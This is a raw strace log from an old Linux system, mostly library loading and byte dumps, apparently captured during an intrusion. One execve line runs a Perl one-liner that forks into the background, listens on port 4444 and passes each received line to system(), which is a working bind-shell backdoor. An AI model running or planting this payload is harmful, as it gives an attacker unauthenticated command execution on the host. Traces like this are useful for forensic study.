\0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\340n\0\0\340~\0\0\340~\0\0\24\1\0\0\24\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\32\0\0\0&\0\0\0\4\0\0\0\7\0\0\0Q\0\200\2@\t\21\r\0\4\33\200\21H\262\201&\0\0\0\'\0\0\0(\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0)\0\0\0*\0\0\0+\0\0\0\0\0\0\0-\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0\0\0\0\0\0\0\0\0002\0\0\0\0\0\0\0003\0\0\0004\0\0\0\0\0\0\0005\0\0\0\207[\246\22\365\33=\274\365\365K\23\0012\310%;]^\2674\10\301\346\357\37>\346\312\271\330\2749\303M%", 512) = 512

10002 07:30:53.636306 fstat64(1, {st_mode=S_IFREG|0644, st_size=30436, ...}) = 0

10002 07:30:53.636324 mmap2(NULL, 33352, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d6f000

10002 07:30:53.636336 mmap2(0xb7d76000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x6) = 0xb7d76000

10002 07:30:53.636354 close(1)          = 0

10002 07:30:53.636379 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.636392 open("/lib/tls/i686/cmov/libnsl.so.1", O_RDONLY) = 1

10002 07:30:53.636406 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\00001\0\0004\0\0\0\234B\1\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340,\1\0\340,\1\0\340,\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\3407\1\0\3407\1\0\5\0\0\0\0\20\0\0\1\0\0\0\300>\1\0\300N\1\0\300N\1\0\350\2\0\0()\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\300>\1\0\300N\1\0\300N\1\0004\1\0\0004\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\374\0\0\0q\0\0\0 \0\0\0\n\0\0\0\1\1$\232 \'Q\0@ \0\0\f\1\1\n\1\n\0\0\240:X\0@\1\16$\10\4\200\n`\260\23 @\24\21\20@\3442\324\4H\346\0\1`\3@\260\272\2019\30\235\340\0\0\332\200\0044\2\201J\20{\203+\200\22 d\21\1\0\2\200\306 d`A\n\4\4\4\v\4PD@\200\20\0\22 \4\340@\1\32 \4\2\20\10\0\0\204\260\200\0\340\23\0\212$\0\206\210\0\2`@q\0\0\0\0\0\0\0\0\0\0\0r\0\0\0\0\0\0\0t\0\0\0\0\0\0\0", 512) = 512

10002 07:30:53.636491 fstat64(1, {st_mode=S_IFREG|0644, st_size=83708, ...}) = 0

10002 07:30:53.636507 mmap2(NULL, 96232, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d57000

10002 07:30:53.636522 mmap2(0xb7d6b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7d6b000

10002 07:30:53.636537 mmap2(0xb7d6d000, 6120, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7d6d000

10002 07:30:53.636551 close(1)          = 0

10002 07:30:53.636576 munmap(0xb7efd000, 29913) = 0

10002 07:30:53.636593 open("/etc/ld.so.cache", O_RDONLY) = 1

10002 07:30:53.636606 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10002 07:30:53.636622 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7efd000

10002 07:30:53.636632 close(1)          = 0

10002 07:30:53.636642 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.636656 open("/lib/tls/i686/cmov/libnss_nis.so.2", O_RDONLY) = 1

10002 07:30:53.636683 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20\31\0\0004\0\0\0\320\201\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\350x\0\0\350x\0\0\350x\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\310}\0\0\310}\0\0\5\0\0\0\0\20\0\0\1\0\0\0\334~\0\0\334\216\0\0\334\216\0\0\374\1\0\0`\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360~\0\0\360\216\0\0\360\216\0\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334~\0\0\334\216\0\0\334\216\0\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0g\0\0\0000\0\0\0\20\0\0\0\t\0\0\0\2\0\0H  \26\20\0\0@g\3\0\3\6\30\24\0248A\30&\243\301\200\212\0048\21\10 B@\310\24\344\20\311\244\10\0\4\0\0@\0P!\0\0\204\0\0\0\0@\v\0y\243\0D\202\0\0\0\0000\0\0\0001\0\0\0\0\0\0\0002\0\0\0003\0\0\0004\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0005\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0006\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0007\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10002 07:30:53.636829 fstat64(1, {st_mode=S_IFREG|0644, st_size=34352, ...}) = 0

10002 07:30:53.636860 mmap2(NULL, 37436, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d4d000

10002 07:30:53.636871 mmap2(0xb7d55000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x7) = 0xb7d55000

10002 07:30:53.636887 close(1)          = 0

10002 07:30:53.636900 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10002 07:30:53.636913 open("/lib/tls/i686/cmov/libnss_files.so.2", O_RDONLY) = 1

10002 07:30:53.636927 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\340\30\0\0004\0\0\0\254\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\330\206\0\0\330\206\0\0\330\206\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\240\213\0\0\240\213\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0\314\1\0\0\260\3\0\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\350\216\0\0\350\236\0\0\350\236\0\0\f\1\0\0\f\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0k\0\0\0.\0\0\0\20\0\0\0\t\0\0\0\"F\340\24\240\240\245\1\31\10\200\20\203\6\212\10\0\0\222@]\1(\nx\10 \"\220\200\20,\5\1\204\4)!\0224\0\24\0\31\0\0\2\2\210@\0\200@0\210\201@@\200\0B\0\6\300.\0\0\0\0\0\0\0\0\0\0\0/\0\0\0000\0\0\0001\0\0\0002\0\0\0003\0\0\0\0\0\0\0004\0\0\0\0\0\0\0005\0\0\0007\0\0\0008\0\0\0\0\0\0\0:\0\0\0\0\0\0\0;\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0", 512) = 512

10002 07:30:53.637014 fstat64(1, {st_mode=S_IFREG|0644, st_size=38412, ...}) = 0

10002 07:30:53.637031 mmap2(NULL, 41624, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d42000

10002 07:30:53.637042 mmap2(0xb7d4b000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x8) = 0xb7d4b000

10002 07:30:53.637057 close(1)          = 0

10002 07:30:53.637081 munmap(0xb7efd000, 29913) = 0

10002 07:30:53.637097 open("/etc/passwd", O_RDONLY|0x80000 /* O_??? */) = 1

10002 07:30:53.637111 fcntl64(1, F_GETFD) = 0x1 (flags FD_CLOEXEC)

10002 07:30:53.637122 _llseek(1, 0, [0], SEEK_CUR) = 0

10002 07:30:53.637134 fstat64(1, {st_mode=S_IFREG|0644, st_size=1624, ...}) = 0

10002 07:30:53.637150 mmap2(NULL, 1624, PROT_READ, MAP_SHARED, 1, 0) = 0xb7f04000

10002 07:30:53.637160 _llseek(1, 1624, [1624], SEEK_SET) = 0

10002 07:30:53.637187 munmap(0xb7f04000, 1624) = 0

10002 07:30:53.637228 close(1)          = 0

10002 07:30:53.637288 getpgrp()         = 3831

10002 07:30:53.637298 rt_sigaction(SIGCHLD, {0x807e540, [], 0}, {SIG_DFL}, 8) = 0

10002 07:30:53.637312 getrlimit(RLIMIT_NPROC, {rlim_cur=8191, rlim_max=8191}) = 0

10002 07:30:53.637329 brk(0x8101000)    = 0x8101000

10002 07:30:53.637360 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10002 07:30:53.637375 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10002 07:30:53.637389 rt_sigprocmask(SIG_BLOCK, NULL, [], 8) = 0

10002 07:30:53.637426 brk(0x8102000)    = 0x8102000

10002 07:30:53.637451 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10002 07:30:53.637470 stat64("/sbin/AB", 0xbf8e1f38) = -1 ENOENT (No such file or directory)

10002 07:30:53.637482 stat64("/bin/AB", 0xbf8e1f38) = -1 ENOENT (No such file or directory)

10002 07:30:53.637493 stat64("/usr/sbin/AB", 0xbf8e1f38) = -1 ENOENT (No such file or directory)

10002 07:30:53.637505 stat64("/usr/bin/AB", 0xbf8e1f38) = -1 ENOENT (No such file or directory)

10002 07:30:53.637518 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10002 07:30:53.637532 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d786f8) = 10003

10003 07:30:53.637575 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10003 07:30:53.637591 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10003 07:30:53.637604 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10003 07:30:53.637615 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10003 07:30:53.637632 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10003 07:30:53.637647 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10003 07:30:53.637660 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10003 07:30:53.637770 write(2, "sh: AB: command not found\n", 26) = -1 EPIPE (Broken pipe)

10003 07:30:53.637784 --- SIGPIPE (Broken pipe) @ 0 (0) ---

10003 07:30:53.637849 exit_group(127)   = ?

10002 07:30:53.662418 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10002 07:30:53.662418 --- SIGCHLD (Child exited) @ 0 (0) ---

10002 07:30:53.662418 waitpid(-1,  <unfinished ...>

4519  07:30:53.662418 waitpid(10002,  <unfinished ...>

10002 07:30:53.662418 <... waitpid resumed> [{WIFEXITED(s) && WEXITSTATUS(s) == 127}], WNOHANG) = 10003

10002 07:30:53.672239 waitpid(-1, 0xbf8e1bb8, WNOHANG) = -1 ECHILD (No child processes)

10002 07:30:53.672270 sigreturn()       = ? (mask now [])

10002 07:30:53.672295 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10002 07:30:53.672311 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10002 07:30:53.672322 rt_sigprocmask(SIG_BLOCK, [CHLD], [], 8) = 0

10002 07:30:53.672334 rt_sigaction(SIGINT, {0x807f150, [], 0}, {SIG_DFL}, 8) = 0

10002 07:30:53.672353 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10002 07:30:53.672364 rt_sigaction(SIGINT, {SIG_DFL}, {0x807f150, [], 0}, 8) = 0

10002 07:30:53.672400 stat64(".", {st_mode=S_IFDIR|0700, st_size=4096, ...}) = 0

10002 07:30:53.672420 stat64("/sbin/perl", 0xbf8e1f68) = -1 ENOENT (No such file or directory)

10002 07:30:53.672432 stat64("/bin/perl", 0xbf8e1f68) = -1 ENOENT (No such file or directory)

10002 07:30:53.672444 stat64("/usr/sbin/perl", 0xbf8e1f68) = -1 ENOENT (No such file or directory)

10002 07:30:53.672455 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10002 07:30:53.672473 stat64("/usr/bin/perl", {st_mode=S_IFREG|0755, st_size=1080724, ...}) = 0

10002 07:30:53.672498 rt_sigprocmask(SIG_BLOCK, [INT CHLD], [], 8) = 0

10002 07:30:53.672513 clone(child_stack=0, flags=CLONE_CHILD_CLEARTID|CLONE_CHILD_SETTID|SIGCHLD, child_tidptr=0xb7d786f8) = 10004

10004 07:30:53.672569 rt_sigprocmask(SIG_SETMASK, [], NULL, 8) = 0

10004 07:30:53.672586 rt_sigaction(SIGTSTP, {SIG_DFL}, {SIG_DFL}, 8) = 0

10004 07:30:53.672599 rt_sigaction(SIGTTIN, {SIG_DFL}, {SIG_DFL}, 8) = 0

10004 07:30:53.672610 rt_sigaction(SIGTTOU, {SIG_DFL}, {SIG_DFL}, 8) = 0

10004 07:30:53.672627 rt_sigaction(SIGINT, {SIG_DFL}, {SIG_DFL}, 8) = 0

10004 07:30:53.672642 rt_sigaction(SIGQUIT, {SIG_IGN}, {SIG_IGN}, 8) = 0

10004 07:30:53.672655 rt_sigaction(SIGCHLD, {SIG_DFL}, {0x807e540, [], 0}, 8) = 0

10004 07:30:53.672729 execve("/usr/bin/perl", ["perl", "-MIO", "-e", "$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(<>){if($_=~ /(.*)/){system $1;}};"], [/* 14 vars */]) = 0

10004 07:30:53.672837 brk(0)            = 0x8153000

10004 07:30:53.672858 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10004 07:30:53.672874 mmap2(NULL, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eeb000

10004 07:30:53.672890 access("/etc/ld.so.preload", R_OK) = -1 ENOENT (No such file or directory)

10004 07:30:53.672907 open("/etc/ld.so.cache", O_RDONLY) = 1

10004 07:30:53.672919 fstat64(1, {st_mode=S_IFREG|0644, st_size=29913, ...}) = 0

10004 07:30:53.672936 mmap2(NULL, 29913, PROT_READ, MAP_PRIVATE, 1, 0) = 0xb7ee3000

10004 07:30:53.672946 close(1)          = 0

10004 07:30:53.672957 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10004 07:30:53.672972 open("/lib/tls/i686/cmov/libdl.so.2", O_RDONLY) = 1

10004 07:30:53.672986 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0p\n\0\0004\0\0\0L!\0\0\0\0\0\0004\0 \0\10\0(\0\35\0\34\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0003\33\0\0003\33\0\0003\33\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\374\34\0\0\374\34\0\0\5\0\0\0\0\20\0\0\1\0\0\0\264\36\0\0\264.\0\0\264.\0\0\230\1\0\0\310\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\320\36\0\0\320.\0\0\320.\0\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\264\36\0\0\264.\0\0\264.\0\0@\1\0\0@\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\26\0\0\0\31\0\0\0\4\0\0\0\7\0\0\0\230\0\21\0\0B\0\0\202\0`\10\223(\10\336\31\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\32\0\0\0\0\0\0\0\33\0\0\0\34\0\0\0\0\0\0\0\36\0\0\0\0\0\0\0\0\0\0\0\37\0\0\0!\0\0\0\"\0\0\0\0\0\0\0\0\0\0\0#\0\0\0%\0\0\0&\0\0\0\0\0\0\0(\0\0\0\221!\374\370\225\263_\31\5\350\7\371\6\2\4\371\7\2\4\371\301S\200\30\256\304M\17a\242\222\6\325=l\366\327=l\366\370\31sB\353\26\251\30\373\31sB", 512) = 512

10004 07:30:53.673077 fstat64(1, {st_mode=S_IFREG|0644, st_size=9684, ...}) = 0

10004 07:30:53.673094 mmap2(NULL, 12412, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7edf000

10004 07:30:53.673106 mmap2(0xb7ee1000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x1) = 0xb7ee1000

10004 07:30:53.673123 close(1)          = 0

10004 07:30:53.673134 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10004 07:30:53.673148 open("/lib/tls/i686/cmov/libm.so.6", O_RDONLY) = 1

10004 07:30:53.673162 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0@4\0\0004\0\0\0PB\2\0\0\0\0\0004\0 \0\t\0(\0 \0\37\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0x\20\2\0x\20\2\0x\20\2\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0$/\2\0$/\2\0\5\0\0\0\0\20\0\0\1\0\0\0\334>\2\0\334>\2\0\334>\2\0`\1\0\0\244\1\0\0\6\0\0\0\0\20\0\0\2\0\0\0\360>\2\0\360>\2\0\360>\2\0\350\0\0\0\350\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\214\20\2\0\214\20\2\0\214\20\2\0\34\4\0\0\34\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\334>\2\0\334>\2\0\334>\2\0\30\1\0\0\30\1\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\214\2\0\0\17\0\0\0@\0\0\0\v\0\0\0%\220 \305\t\204g\v\0\302\20 \4iER\202\20\200\240\0}\210\272\10\10I\0\0\0\0\0\33\4\201\0\0\0\232U\20A P \200\224\202\220\21@\3722\0\304a\24\0\10\6\306\220\232\f\207\300 \250\0  \202\0\230\201\4E\7\0054a\2\0\0\251C\30\310 \10\23\30\24M8\"\0\22\24\21@T\203\2E\1\1\1\244\fX\20\0\210\2\0 \0@\0$\214\5\10", 512) = 512

10004 07:30:53.673308 fstat64(1, {st_mode=S_IFREG|0644, st_size=149328, ...}) = 0

10004 07:30:53.673326 mmap2(NULL, 147584, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7eba000

10004 07:30:53.673337 mmap2(0xb7edd000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x23) = 0xb7edd000

10004 07:30:53.673353 close(1)          = 0

10004 07:30:53.673365 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10004 07:30:53.673379 open("/lib/tls/i686/cmov/libpthread.so.0", O_RDONLY) = 1

10004 07:30:53.673393 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\20H\0\0004\0\0\0\330C\1\0\0\0\0\0004\0 \0\t\0(\0$\0!\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0 \1\0\0 \1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\224\n\1\0\224\n\1\0\224\n\1\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\4;\1\0\4;\1\0\5\0\0\0\0\20\0\0\1\0\0\0\344=\1\0\344M\1\0\344M\1\0T\3\0\0\374#\0\0\6\0\0\0\0\20\0\0\2\0\0\0\324>\1\0\324N\1\0\324N\1\0\370\0\0\0\370\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0T\1\0\0T\1\0\0T\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0P\345td\250\n\1\0\250\n\1\0\250\n\1\0\314\4\0\0\314\4\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\344=\1\0\344M\1\0\344M\1\0\20\2\0\0\20\2\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\262\1\0\0L\0\0\0@\0\0\0\v\0\0\0\31!\2\221\1\n\20\"@H \331\3\0I4\200\0\0@\0 \200\200\21P`@@\22\213\0020D\0\0\20\0\0\2\0\1\r\0\204\n\360\1X\260\r\240\200\10 $\204\20B\242)m\10G\234V\20\0\224 \204$\10\0H(\1\222\34\301B\240\220\22\10\f \2\30`A\244c\4\0\n\32\3\0\0)\0(\314@\204\210L\22\10\241\0\4\0\10\0\300Q\0\2009\4C\300", 512) = 512

10004 07:30:53.673478 fstat64(1, {st_mode=S_IFREG|0755, st_size=112354, ...}) = 0

10004 07:30:53.673494 mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7eb9000

10004 07:30:53.673507 mmap2(NULL, 94688, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7ea1000

10004 07:30:53.673518 mmap2(0xb7eb5000, 8192, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x13) = 0xb7eb5000

10004 07:30:53.673532 mmap2(0xb7eb7000, 4576, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7eb7000

10004 07:30:53.673546 close(1)          = 0

10004 07:30:53.673558 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10004 07:30:53.673571 open("/lib/tls/i686/cmov/libc.so.6", O_RDONLY) = 1

10004 07:30:53.673585 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0\260e\1\0004\0\0\0\4\307\24\0\0\0\0\0004\0 \0\n\0(\0D\0C\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0@\1\0\0@\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\2200\23\0\2200\23\0\2200\23\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0(\215\24\0(\215\24\0\5\0\0\0\0\20\0\0\1\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\260\'\0\0\204T\0\0\6\0\0\0\0\20\0\0\2\0\0\0\234\255\24\0\234\255\24\0\234\255\24\0\360\0\0\0\360\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0t\1\0\0t\1\0\0t\1\0\0 \0\0\0 \0\0\0\4\0\0\0\4\0\0\0\7\0\0\0\354\221\24\0\354\221\24\0\354\221\24\0\10\0\0\0,\0\0\0\4\0\0\0\4\0\0\0P\345td\2440\23\0\2440\23\0\2440\23\0\354+\0\0\354+\0\0\4\0\0\0\4\0\0\0Q\345td\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\6\0\0\0\4\0\0\0R\345td\354\221\24\0\354\221\24\0\354\221\24\0\10\36\0\0\10\36\0\0\4\0\0\0\1\0\0\0\4\0\0\0\20\0\0\0\1\0\0\0GNU\0\0\0\0\0\2\0\0\0\6\0\0\0\10\0\0\0\363\3\0\0\n\0\0\0\0\2\0\0\16\0\0\0\2400\20D\200 \2\1\214\3\346\220AE\210\0\204\0\10\0A\200\0@\300\200\0\f\2\f\0\0010\0\10@\"\10\246\4\210H6l\240\0260\0&\204\200\216\4\10B$\2\f\246\244\32\6c\310\0\302 \1\300\0R\0!\201\10\4\n  \250\24\0\24(`\0\0P\240\312DB", 512) = 512

10004 07:30:53.673671 fstat64(1, {st_mode=S_IFREG|0755, st_size=1364388, ...}) = 0

10004 07:30:53.673731 mmap2(NULL, 1369712, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_DENYWRITE, 1, 0) = 0xb7d52000

10004 07:30:53.673746 mmap2(0xb7e9b000, 12288, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_DENYWRITE, 1, 0x149) = 0xb7e9b000

10004 07:30:53.673778 mmap2(0xb7e9e000, 9840, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0xb7e9e000

10004 07:30:53.673809 close(1)          = 0

10004 07:30:53.673821 access("/etc/ld.so.nohwcap", F_OK) = -1 ENOENT (No such file or directory)

10004 07:30:53.673834 open("/lib/tls/i686/cmov/libcrypt.so.1", O_RDONLY) = 1

10004 07:30:53.673848 read(1, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3\0\3\0\1\0\0\0000\7\0\0004\0\0\0<\221\0\0\0\0\0\0004\0 \0\10\0(\0\34\0\33\0\6\0\0\0004\0\0\0004\0\0\0004\0\0\0\0\1\0\0\0\1\0\0\5\0\0\0\4\0\0\0\3\0\0\0\340\210\0\0\340\210\0\0\340\210\0\0\23\0\0\0\23\0\0\0\4\0\0\0\1\0\0\0\1\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\f\212\0\0\f\212\0\0\5\0\0\0\0\20\0\0\1\0\0\0\350\216\0\0\350\236\0\0\350\236\0\0`\1\0\0tr\2\0\6\0\0\0\0\20\0\0\2\0\0\0\374\216\0\0\374\236\0\0\374\236\0\0\340\0\0\0\340\0\0\0\6\0\0\0\4\0\0\0\4\0\0\0004\1\0\0004\1\0\0004\1\0\0 \0\0\0 